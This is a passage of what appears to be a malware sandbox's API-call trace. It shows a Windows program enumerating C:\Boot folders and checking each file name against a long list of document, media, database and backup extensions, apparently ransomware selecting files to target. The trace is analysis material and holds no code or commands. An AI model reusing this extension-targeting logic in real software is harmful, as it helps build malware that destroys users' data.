(in: hFindFile=0x6f1ff0, lpFindFileData=0x33dfa84 | out: lpFindFileData=0x33dfa84*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac30ebc0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac30ebc0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0035.278] FindNextFileW (in: hFindFile=0x6f1ff0, lpFindFileData=0x33dfa84 | out: lpFindFileData=0x33dfa84*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac2e8a60, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x2ebf9340, ftLastAccessTime.dwHighDateTime=0x1d4d597, ftLastWriteTime.dwLowDateTime=0x2ebf9340, ftLastWriteTime.dwHighDateTime=0x1d4d597, nFileSizeHigh=0x0, nFileSizeLow=0x6000, dwReserved0=0x0, dwReserved1=0x0, cFileName="BCD", cAlternateFileName="")) returned 1 [0035.278] lstrlenW (lpString="BCD") returned 3 [0035.278] lstrlenW (lpString=".1cd") returned 4 [0035.278] lstrcmpiW (lpString1=".1cd", lpString2="") returned 1 [0035.278] lstrlenW (lpString=".3ds") returned 4 [0035.278] lstrcmpiW (lpString1=".3ds", lpString2="") returned 1 [0035.278] lstrlenW (lpString=".3fr") returned 4 [0035.278] lstrcmpiW (lpString1=".3fr", lpString2="") returned 1 [0035.278] lstrlenW (lpString=".3g2") returned 4 [0035.278] lstrcmpiW (lpString1=".3g2", lpString2="") returned 1 [0035.278] lstrlenW (lpString=".3gp") returned 4 [0035.278] lstrcmpiW (lpString1=".3gp", lpString2="") returned 1 [0035.278] lstrlenW (lpString=".7z") returned 3 [0035.278] lstrcmpiW (lpString1=".7z", lpString2="BCD") returned -1 [0035.278] lstrlenW (lpString=".accda") returned 6 [0035.278] lstrcmpiW (lpString1=".accda", lpString2="") returned 1 [0035.278] lstrlenW (lpString=".accdb") returned 6 [0035.278] lstrcmpiW (lpString1=".accdb", lpString2="") returned 1 [0035.278] lstrlenW (lpString=".accdc") returned 6 [0035.278] lstrcmpiW (lpString1=".accdc", lpString2="") returned 1 [0035.278] lstrlenW (lpString=".accde") returned 6 [0035.279] lstrcmpiW (lpString1=".accde", lpString2="") returned 1 [0035.279] lstrlenW (lpString=".accdt") returned 6 [0035.279] lstrcmpiW (lpString1=".accdt", lpString2="") returned 1 [0035.279] lstrlenW (lpString=".accdw") returned 6 [0035.279] lstrcmpiW (lpString1=".accdw", lpString2="") returned 1 [0035.279] lstrlenW (lpString=".adb") returned 4 [0035.279] lstrcmpiW (lpString1=".adb", lpString2="") returned 1 [0035.279] lstrlenW (lpString=".adp") returned 4 [0035.279] lstrcmpiW (lpString1=".adp", lpString2="") returned 1 [0035.279] lstrlenW (lpString=".ai") returned 3 [0035.279] lstrcmpiW (lpString1=".ai", lpString2="BCD") returned -1 [0035.279] lstrlenW (lpString=".ai3") returned 4 [0035.279] lstrcmpiW (lpString1=".ai3", lpString2="") returned 1 [0035.279] lstrlenW (lpString=".ai4") returned 4 [0035.279] lstrcmpiW (lpString1=".ai4", lpString2="") returned 1 [0035.279] lstrlenW (lpString=".ai5") returned 4 [0035.279] lstrcmpiW (lpString1=".ai5", lpString2="") returned 1 [0035.279] lstrlenW (lpString=".ai6") returned 4 [0035.279] lstrcmpiW (lpString1=".ai6", lpString2="") returned 1 [0035.279] lstrlenW (lpString=".ai7") returned 4 [0035.279] lstrcmpiW (lpString1=".ai7", lpString2="") returned 1 [0035.279] lstrlenW (lpString=".ai8") returned 4 [0035.279] lstrcmpiW (lpString1=".ai8", lpString2="") returned 1 [0035.279] lstrlenW (lpString=".anim") returned 5 [0035.279] lstrcmpiW (lpString1=".anim", lpString2="") returned 1 [0035.279] lstrlenW (lpString=".arw") returned 4 [0035.279] lstrcmpiW (lpString1=".arw", lpString2="") returned 1 [0035.279] lstrlenW (lpString=".as") returned 3 [0035.279] lstrcmpiW (lpString1=".as", lpString2="BCD") returned -1 [0035.279] lstrlenW (lpString=".asa") returned 4 [0035.279] lstrcmpiW (lpString1=".asa", lpString2="") returned 1 [0035.279] lstrlenW (lpString=".asc") returned 4 [0035.279] lstrcmpiW (lpString1=".asc", lpString2="") returned 1 [0035.279] lstrlenW (lpString=".ascx") returned 5 [0035.279] lstrcmpiW (lpString1=".ascx", lpString2="") returned 1 [0035.279] lstrlenW (lpString=".asm") returned 4 [0035.279] lstrcmpiW (lpString1=".asm", lpString2="") returned 1 [0035.279] lstrlenW (lpString=".asmx") returned 5 [0035.280] lstrcmpiW (lpString1=".asmx", lpString2="") returned 1 [0035.280] lstrlenW (lpString=".asp") returned 4 [0035.280] lstrcmpiW (lpString1=".asp", lpString2="") returned 1 [0035.280] lstrlenW (lpString=".aspx") returned 5 [0035.280] lstrcmpiW (lpString1=".aspx", lpString2="") returned 1 [0035.280] lstrlenW (lpString=".asr") returned 4 [0035.280] lstrcmpiW (lpString1=".asr", lpString2="") returned 1 [0035.280] lstrlenW (lpString=".asx") returned 4 [0035.280] lstrcmpiW (lpString1=".asx", lpString2="") returned 1 [0035.280] lstrlenW (lpString=".avi") returned 4 [0035.280] lstrcmpiW (lpString1=".avi", lpString2="") returned 1 [0035.280] lstrlenW (lpString=".avs") returned 4 [0035.280] lstrcmpiW (lpString1=".avs", lpString2="") returned 1 [0035.280] lstrlenW (lpString=".backup") returned 7 [0035.280] lstrcmpiW (lpString1=".backup", lpString2="") returned 1 [0035.280] lstrlenW (lpString=".bak") returned 4 [0035.280] lstrcmpiW (lpString1=".bak", lpString2="") returned 1 [0035.280] lstrlenW (lpString=".bay") returned 4 [0035.280] lstrcmpiW (lpString1=".bay", lpString2="") returned 1 [0035.280] lstrlenW (lpString=".bd") returned 3 [0035.280] lstrcmpiW (lpString1=".bd", lpString2="BCD") returned -1 [0035.280] lstrlenW (lpString=".bin") returned 4 [0035.280] lstrcmpiW (lpString1=".bin", lpString2="") returned 1 [0035.280] lstrlenW (lpString=".bmp") returned 4 [0035.280] lstrcmpiW (lpString1=".bmp", lpString2="") returned 1 [0035.280] lstrlenW (lpString=".bz2") returned 4 [0035.280] lstrcmpiW (lpString1=".bz2", lpString2="") returned 1 [0035.280] lstrlenW (lpString=".c") returned 2 [0035.280] lstrcmpiW (lpString1=".c", lpString2="CD") returned -1 [0035.280] lstrlenW (lpString=".cdr") returned 4 [0035.280] lstrcmpiW (lpString1=".cdr", lpString2="") returned 1 [0035.280] lstrlenW (lpString=".cer") returned 4 [0035.281] lstrcmpiW (lpString1=".cer", lpString2="") returned 1 [0035.281] lstrlenW (lpString=".cf") returned 3 [0035.281] lstrcmpiW (lpString1=".cf", lpString2="BCD") returned -1 [0035.281] lstrlenW (lpString=".cfc") returned 4 [0035.281] lstrcmpiW (lpString1=".cfc", lpString2="") returned 1 [0035.281] lstrlenW (lpString=".cfm") returned 4 [0035.281] lstrcmpiW (lpString1=".cfm", lpString2="") returned 1 [0035.281] lstrlenW (lpString=".cfml") returned 5 [0035.281] lstrcmpiW (lpString1=".cfml", lpString2="") returned 1 [0035.281] lstrlenW (lpString=".cfu") returned 4 [0035.281] lstrcmpiW (lpString1=".cfu", lpString2="") returned 1 [0035.281] lstrlenW (lpString=".chm") returned 4 [0035.281] lstrcmpiW (lpString1=".chm", lpString2="") returned 1 [0035.281] lstrlenW (lpString=".cin") returned 4 [0035.281] lstrcmpiW (lpString1=".cin", lpString2="") returned 1 [0035.281] lstrlenW (lpString=".class") returned 6 [0035.281] lstrcmpiW (lpString1=".class", lpString2="") returned 1 [0035.281] lstrlenW (lpString=".clx") returned 4 [0035.281] lstrcmpiW (lpString1=".clx", lpString2="") returned 1 [0035.281] lstrlenW (lpString=".config") returned 7 [0035.281] lstrcmpiW (lpString1=".config", lpString2="") returned 1 [0035.281] lstrlenW (lpString=".cpp") returned 4 [0035.281] lstrcmpiW (lpString1=".cpp", lpString2="") returned 1 [0035.281] lstrlenW (lpString=".cr2") returned 4 [0035.281] lstrcmpiW (lpString1=".cr2", lpString2="") returned 1 [0035.281] lstrlenW (lpString=".crt") returned 4 [0035.281] lstrcmpiW (lpString1=".crt", lpString2="") returned 1 [0035.281] lstrlenW (lpString=".crw") returned 4 [0035.281] lstrcmpiW (lpString1=".crw", lpString2="") returned 1 [0035.281] lstrlenW (lpString=".cs") returned 3 [0035.281] lstrcmpiW (lpString1=".cs", lpString2="BCD") returned -1 [0035.281] lstrlenW (lpString=".css") returned 4 [0035.281] lstrcmpiW (lpString1=".css", lpString2="") returned 1 [0035.281] lstrlenW (lpString=".csv") returned 4 [0035.281] lstrcmpiW (lpString1=".csv", lpString2="") returned 1 [0035.281] lstrlenW (lpString=".cub") returned 4 [0035.281] lstrcmpiW (lpString1=".cub", lpString2="") returned 1 [0035.281] lstrlenW (lpString=".dae") returned 4 [0035.281] lstrcmpiW (lpString1=".dae", lpString2="") returned 1 [0035.281] lstrlenW (lpString=".dat") returned 4 [0035.281] lstrcmpiW (lpString1=".dat", lpString2="") returned 1 [0035.282] lstrlenW (lpString=".db") returned 3 [0035.282] lstrcmpiW (lpString1=".db", lpString2="BCD") returned -1 [0035.282] lstrlenW (lpString=".dbf") returned 4 [0035.282] lstrcmpiW (lpString1=".dbf", lpString2="") returned 1 [0035.282] lstrlenW (lpString=".dbx") returned 4 [0035.282] lstrcmpiW (lpString1=".dbx", lpString2="") returned 1 [0035.282] lstrlenW (lpString=".dc3") returned 4 [0035.282] lstrcmpiW (lpString1=".dc3", lpString2="") returned 1 [0035.282] lstrlenW (lpString=".dcm") returned 4 [0035.282] lstrcmpiW (lpString1=".dcm", lpString2="") returned 1 [0035.282] lstrlenW (lpString=".dcr") returned 4 [0035.282] lstrcmpiW (lpString1=".dcr", lpString2="") returned 1 [0035.282] lstrlenW (lpString=".der") returned 4 [0035.282] lstrcmpiW (lpString1=".der", lpString2="") returned 1 [0035.282] lstrlenW (lpString=".dib") returned 4 [0035.282] lstrcmpiW (lpString1=".dib", lpString2="") returned 1 [0035.282] lstrlenW (lpString=".dic") returned 4 [0035.282] lstrcmpiW (lpString1=".dic", lpString2="") returned 1 [0035.282] lstrlenW (lpString=".dif") returned 4 [0035.282] lstrcmpiW (lpString1=".dif", lpString2="") returned 1 [0035.282] lstrlenW (lpString=".divx") returned 5 [0035.282] lstrcmpiW (lpString1=".divx", lpString2="") returned 1 [0035.282] lstrlenW (lpString=".djvu") returned 5 [0035.282] lstrcmpiW (lpString1=".djvu", lpString2="") returned 1 [0035.282] lstrlenW (lpString=".dng") returned 4 [0035.282] lstrcmpiW (lpString1=".dng", lpString2="") returned 1 [0035.282] lstrlenW (lpString=".doc") returned 4 [0035.282] lstrcmpiW (lpString1=".doc", lpString2="") returned 1 [0035.282] lstrlenW (lpString=".docm") returned 5 [0035.282] lstrcmpiW (lpString1=".docm", lpString2="") returned 1 [0035.282] lstrlenW (lpString=".docx") returned 5 [0035.282] lstrcmpiW (lpString1=".docx", lpString2="") returned 1 [0035.282] lstrlenW (lpString=".dot") returned 4 [0035.282] lstrcmpiW (lpString1=".dot", lpString2="") returned 1 [0035.282] lstrlenW (lpString=".dotm") returned 5 [0035.282] lstrcmpiW (lpString1=".dotm", lpString2="") returned 1 [0035.282] lstrlenW (lpString=".dotx") returned 5 [0035.282] lstrcmpiW (lpString1=".dotx", lpString2="") returned 1 [0035.282] lstrlenW (lpString=".dpx") returned 4 [0035.282] lstrcmpiW (lpString1=".dpx", lpString2="") returned 1 [0035.282] lstrlenW (lpString=".dqy") returned 4 [0035.283] lstrcmpiW (lpString1=".dqy", lpString2="") returned 1 [0035.283] lstrlenW (lpString=".dsn") returned 4 [0035.283] lstrcmpiW (lpString1=".dsn", lpString2="") returned 1 [0035.283] lstrlenW (lpString=".dt") returned 3 [0035.283] lstrcmpiW (lpString1=".dt", lpString2="BCD") returned -1 [0035.283] lstrlenW (lpString=".dtd") returned 4 [0035.283] lstrcmpiW (lpString1=".dtd", lpString2="") returned 1 [0035.283] lstrlenW (lpString=".dwg") returned 4 [0035.283] lstrcmpiW (lpString1=".dwg", lpString2="") returned 1 [0035.283] lstrlenW (lpString=".dwt") returned 4 [0035.283] lstrcmpiW (lpString1=".dwt", lpString2="") returned 1 [0035.283] lstrlenW (lpString=".dx") returned 3 [0035.283] lstrcmpiW (lpString1=".dx", lpString2="BCD") returned -1 [0035.283] lstrlenW (lpString=".dxf") returned 4 [0035.283] lstrcmpiW (lpString1=".dxf", lpString2="") returned 1 [0035.283] lstrlenW (lpString=".edml") returned 5 [0035.283] lstrcmpiW (lpString1=".edml", lpString2="") returned 1 [0035.283] lstrlenW (lpString=".efd") returned 4 [0035.283] lstrcmpiW (lpString1=".efd", lpString2="") returned 1 [0035.283] lstrlenW (lpString=".elf") returned 4 [0035.283] lstrcmpiW (lpString1=".elf", lpString2="") returned 1 [0035.283] lstrlenW (lpString=".emf") returned 4 [0035.283] lstrcmpiW (lpString1=".emf", lpString2="") returned 1 [0035.283] lstrlenW (lpString=".emz") returned 4 [0035.283] lstrcmpiW (lpString1=".emz", lpString2="") returned 1 [0035.283] lstrlenW (lpString=".epf") returned 4 [0035.283] lstrcmpiW (lpString1=".epf", lpString2="") returned 1 [0035.283] lstrlenW (lpString=".eps") returned 4 [0035.283] lstrcmpiW (lpString1=".eps", lpString2="") returned 1 [0035.283] lstrlenW (lpString=".epsf") returned 5 [0035.283] lstrcmpiW (lpString1=".epsf", lpString2="") returned 1 [0035.283] lstrlenW (lpString=".epsp") returned 5 [0035.283] lstrcmpiW (lpString1=".epsp", lpString2="") returned 1 [0035.283] lstrlenW (lpString=".erf") returned 4 [0035.283] lstrcmpiW (lpString1=".erf", lpString2="") returned 1 [0035.283] lstrlenW (lpString=".exr") returned 4 [0035.283] lstrcmpiW (lpString1=".exr", lpString2="") returned 1 [0035.283] lstrlenW (lpString=".f4v") returned 4 [0035.283] lstrcmpiW (lpString1=".f4v", lpString2="") returned 1 [0035.283] lstrlenW (lpString=".fido") returned 5 [0035.283] lstrcmpiW (lpString1=".fido", lpString2="") returned 1 [0035.284] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xfffe) returned 0x39006d0 [0035.284] FindFirstFileW (in: lpFileName="C:\\Boot\\cs-CZ\\*", lpFindFileData=0x33df808 | out: lpFindFileData=0x33df808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac015040, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac015040, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6f3038 [0035.322] FindNextFileW (in: hFindFile=0x6f3038, lpFindFileData=0x33df808 | out: lpFindFileData=0x33df808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac015040, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac015040, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0035.322] FindNextFileW (in: hFindFile=0x6f3038, lpFindFileData=0x33df808 | out: lpFindFileData=0x33df808*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac015040, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe88a2888, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15c50, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0035.322] FindClose (in: hFindFile=0x6f3038 | out: hFindFile=0x6f3038) returned 1 [0035.322] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x39006d0 | out: hHeap=0x600000) returned 1 [0035.322] FindNextFileW (in: hFindFile=0x6f1ff0, lpFindFileData=0x33dfa84 | out: lpFindFileData=0x33dfa84*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="da-DK", cAlternateFileName="")) returned 1 [0035.322] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xfffe) returned 0x39006d0 [0035.322] FindFirstFileW (in: lpFileName="C:\\Boot\\da-DK\\*", lpFindFileData=0x33df808 | out: lpFindFileData=0x33df808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6f3038 [0035.323] FindNextFileW (in: hFindFile=0x6f3038, lpFindFileData=0x33df808 | out: lpFindFileData=0x33df808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0035.323] FindNextFileW (in: hFindFile=0x6f3038, lpFindFileData=0x33df808 | out: lpFindFileData=0x33df808*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe868d5aa, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15640, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0035.323] FindClose (in: hFindFile=0x6f3038 | out: hFindFile=0x6f3038) returned 1 [0035.323] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x39006d0 | out: hHeap=0x600000) returned 1 [0035.323] FindNextFileW (in: hFindFile=0x6f1ff0, lpFindFileData=0x33dfa84 | out: lpFindFileData=0x33dfa84*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="de-DE", cAlternateFileName="")) returned 1 [0035.323] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xfffe) returned 0x39006d0 [0035.323] FindFirstFileW (in: lpFileName="C:\\Boot\\de-DE\\*", lpFindFileData=0x33df808 | out: lpFindFileData=0x33df808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6f3038 [0035.323] FindNextFileW (in: hFindFile=0x6f3038, lpFindFileData=0x33df808 | out: lpFindFileData=0x33df808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0035.323] FindNextFileW (in: hFindFile=0x6f3038, lpFindFileData=0x33df808 | out: lpFindFileData=0x33df808*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8132526, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16640, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0035.323] FindClose (in: hFindFile=0x6f3038 | out: hFindFile=0x6f3038) returned 1 [0035.323] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x39006d0 | out: hHeap=0x600000) returned 1 [0035.323] FindNextFileW (in: hFindFile=0x6f1ff0, lpFindFileData=0x33dfa84 | out: lpFindFileData=0x33dfa84*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="el-GR", cAlternateFileName="")) returned 1 [0035.323] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xfffe) returned 0x39006d0 [0035.323] FindFirstFileW (in: lpFileName="C:\\Boot\\el-GR\\*", lpFindFileData=0x33df808 | out: lpFindFileData=0x33df808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6f3038 [0035.324] FindNextFileW (in: hFindFile=0x6f3038, lpFindFileData=0x33df808 | out: lpFindFileData=0x33df808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0035.324] FindNextFileW (in: hFindFile=0x6f3038, lpFindFileData=0x33df808 | out: lpFindFileData=0x33df808*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xea239054, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x17250, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0035.324] FindClose (in: hFindFile=0x6f3038 | out: hFindFile=0x6f3038) returned 1 [0035.324] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x39006d0 | out: hHeap=0x600000) returned 1 [0035.324] FindNextFileW (in: hFindFile=0x6f1ff0, lpFindFileData=0x33dfa84 | out: lpFindFileData=0x33dfa84*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0035.324] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xfffe) returned 0x39006d0 [0035.324] FindFirstFileW (in: lpFileName="C:\\Boot\\en-US\\*", lpFindFileData=0x33df808 | out: lpFindFileData=0x33df808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6f3038 [0035.324] FindNextFileW (in: hFindFile=0x6f3038, lpFindFileData=0x33df808 | out: lpFindFileData=0x33df808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0035.324] FindNextFileW (in: hFindFile=0x6f3038, lpFindFileData=0x33df808 | out: lpFindFileData=0x33df808*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8216d3c, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x14c40, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0035.324] FindClose (in: hFindFile=0x6f3038 | out: hFindFile=0x6f3038) returned 1 [0035.324] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x39006d0 | out: hHeap=0x600000) returned 1 [0035.324] FindNextFileW (in: hFindFile=0x6f1ff0, lpFindFileData=0x33dfa84 | out: lpFindFileData=0x33dfa84*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="es-ES", cAlternateFileName="")) returned 1 [0035.324] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xfffe) returned 0x39006d0 [0035.324] FindFirstFileW (in: lpFileName="C:\\Boot\\es-ES\\*", lpFindFileData=0x33df808 | out: lpFindFileData=0x33df808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6f3038 [0035.324] FindNextFileW (in: hFindFile=0x6f3038, lpFindFileData=0x33df808 | out: lpFindFileData=0x33df808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, 